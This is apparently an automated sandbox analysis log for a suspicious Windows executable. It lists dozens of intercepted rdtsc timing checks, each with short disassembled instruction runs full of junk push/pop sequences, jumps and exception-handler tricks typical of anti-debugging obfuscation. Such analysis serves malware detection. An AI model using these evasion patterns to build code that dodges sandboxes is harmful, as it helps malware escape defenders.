                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2E9B45 second address: 2E9B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 je 00007F8080FFFC56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2E932E second address: 2E9332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2E9332 second address: 2E9338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2E9338 second address: 2E9355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8080B8A77Dh 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F8080B8A776h 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2E94C1 second address: 2E951B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007F8080FFFC5Fh 0x0000000c push ebx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 push edi 0x00000011 jmp 00007F8080FFFC5Bh 0x00000016 jmp 00007F8080FFFC61h 0x0000001b pop edi 0x0000001c popad 0x0000001d pushad 0x0000001e jmp 00007F8080FFFC66h 0x00000023 push eax 0x00000024 push edx 0x00000025 jno 00007F8080FFFC56h 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2E951B second address: 2E955C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8080B8A77Bh 0x00000010 jmp 00007F8080B8A787h 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2E96E4 second address: 2E970D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8080FFFC5Bh 0x00000009 pop ebx 0x0000000a jnl 00007F8080FFFC64h 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2E970D second address: 2E971B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 ja 00007F8080B8A776h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2E971B second address: 2E9721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2ECCAB second address: 2ECCB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2F2214 second address: 2F221A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2F23F8 second address: 2F23FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2F23FC second address: 2F2420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jng 00007F8080FFFC5Eh 0x0000000e jl 00007F8080FFFC58h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jo 00007F8080FFFC56h 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2F2420 second address: 2F242A instructions: 0x00000000 rdtsc 0x00000002 je 00007F8080B8A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D26B3 second address: 2D26B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D26B7 second address: 2D26BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D26BD second address: 2D26C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D26C1 second address: 2D2746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, ebx 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F8080B8A778h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e push ecx 0x0000002f mov dword ptr [ebp+12449DFAh], ecx 0x00000035 pop ebx 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov bh, al 0x0000003f mov eax, dword ptr [ebp+122D0C6Dh] 0x00000045 and di, 8D45h 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push edi 0x0000004f call 00007F8080B8A778h 0x00000054 pop edi 0x00000055 mov dword ptr [esp+04h], edi 0x00000059 add dword ptr [esp+04h], 00000019h 0x00000061 inc edi 0x00000062 push edi 0x00000063 ret 0x00000064 pop edi 0x00000065 ret 0x00000066 xor ebx, 3D6E0123h 0x0000006c or dword ptr [ebp+122D2951h], esi 0x00000072 push eax 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 push ecx 0x00000077 pop ecx 0x00000078 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D2746 second address: 2D274A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2F25A3 second address: 2F25AD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8080B8A77Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2F25AD second address: 2F25BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2F25BC second address: 2F25EE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F8080B8A786h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8080B8A77Ch 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D36EA second address: 2D36EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D37B8 second address: 2D37BD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D5722 second address: 2D5726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D67D1 second address: 2D67DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F8080B8A776h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D67DB second address: 2D67F4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8080FFFC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jl 00007F8080FFFC56h 0x00000018 popad 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2F6646 second address: 2F664C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2F664C second address: 2F665E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2F665E second address: 2F6662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2F679E second address: 2F67A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D8663 second address: 2D86EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8080B8A784h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D1C3Bh], esi 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov edi, dword ptr [ebp+122D1808h] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov eax, dword ptr [ebp+122D0759h] 0x0000002e mov ebx, dword ptr [ebp+122D18A1h] 0x00000034 push FFFFFFFFh 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007F8080B8A778h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 or dword ptr [ebp+12462673h], esi 0x00000056 nop 0x00000057 pushad 0x00000058 jmp 00007F8080B8A786h 0x0000005d push eax 0x0000005e push edx 0x0000005f push edi 0x00000060 pop edi 0x00000061 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D86EA second address: 2D870F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a jnp 00007F8080FFFC56h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8080FFFC62h 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2F6B9E second address: 2F6BA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2F6BA2 second address: 2F6BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F8080FFFC56h 0x0000000f jng 00007F8080FFFC56h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 28DC77 second address: 28DC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 28DC7B second address: 28DC81 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 28DC81 second address: 28DC86 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 28DC86 second address: 28DC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 28DC8C second address: 28DC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 28DC94 second address: 28DCC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8080FFFC56h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jmp 00007F8080FFFC63h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 28DCC1 second address: 28DCC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 28DCC6 second address: 28DCCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2DB62C second address: 2DB636 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8080B8A776h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FB248 second address: 2FB24C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FB24C second address: 2FB25A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FB25A second address: 2FB264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8080FFFC56h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FB264 second address: 2FB289 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8080B8A77Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8080B8A77Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FB289 second address: 2FB28D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2DD7C0 second address: 2DD7D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8080B8A783h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2DD7D8 second address: 2DD7E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2DF81D second address: 2DF822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2DF822 second address: 2DF828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2DF8EB second address: 2DF8F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2E075B second address: 2E075F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FB5C4 second address: 2FB5D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F8080B8A77Ch 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FAF14 second address: 2FAF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FAF1B second address: 2FAF21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FAF21 second address: 2FAF27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FAF27 second address: 2FAF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FC237 second address: 2FC247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8080FFFC56h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FF847 second address: 2FF84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FF84B second address: 2FF86E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F8080FFFC5Ah 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8080FFFC5Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FF86E second address: 2FF872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FF872 second address: 2FF88C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F8080FFFC64h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C7518 second address: 2C751E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C751E second address: 2C7522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C7900 second address: 2C7919 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8080B8A778h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d jnc 00007F8080B8A776h 0x00000013 pop ebx 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C799C second address: 2C79BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C79BB second address: 2C79BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C79BF second address: 2C79C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C79C3 second address: 2C7A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 4B80D576h 0x0000000e add dword ptr [ebp+122D18A6h], edi 0x00000014 call 00007F8080B8A779h 0x00000019 jmp 00007F8080B8A787h 0x0000001e push eax 0x0000001f jmp 00007F8080B8A77Dh 0x00000024 mov eax, dword ptr [esp+04h] 0x00000028 je 00007F8080B8A782h 0x0000002e jo 00007F8080B8A77Ch 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C7B67 second address: 2C7B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C7B7D second address: 2C7B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C7B82 second address: 2C7B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F8080FFFC56h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C83AC second address: 2C83B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C84C5 second address: 2C84CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C8669 second address: 2C86A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8080B8A77Bh 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jg 00007F8080B8A776h 0x00000017 popad 0x00000018 je 00007F8080B8A784h 0x0000001e jmp 00007F8080B8A77Eh 0x00000023 popad 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push ebx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C86A4 second address: 2C86AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C8746 second address: 2C877A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D287Bh], ebx 0x00000014 lea eax, dword ptr [ebp+1247C168h] 0x0000001a jmp 00007F8080B8A77Dh 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jnc 00007F8080B8A776h 0x00000029 push ecx 0x0000002a pop ecx 0x0000002b popad 0x0000002c rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C877A second address: 2C8797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8080FFFC69h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C8797 second address: 2C879B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FFB9B second address: 2FFBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
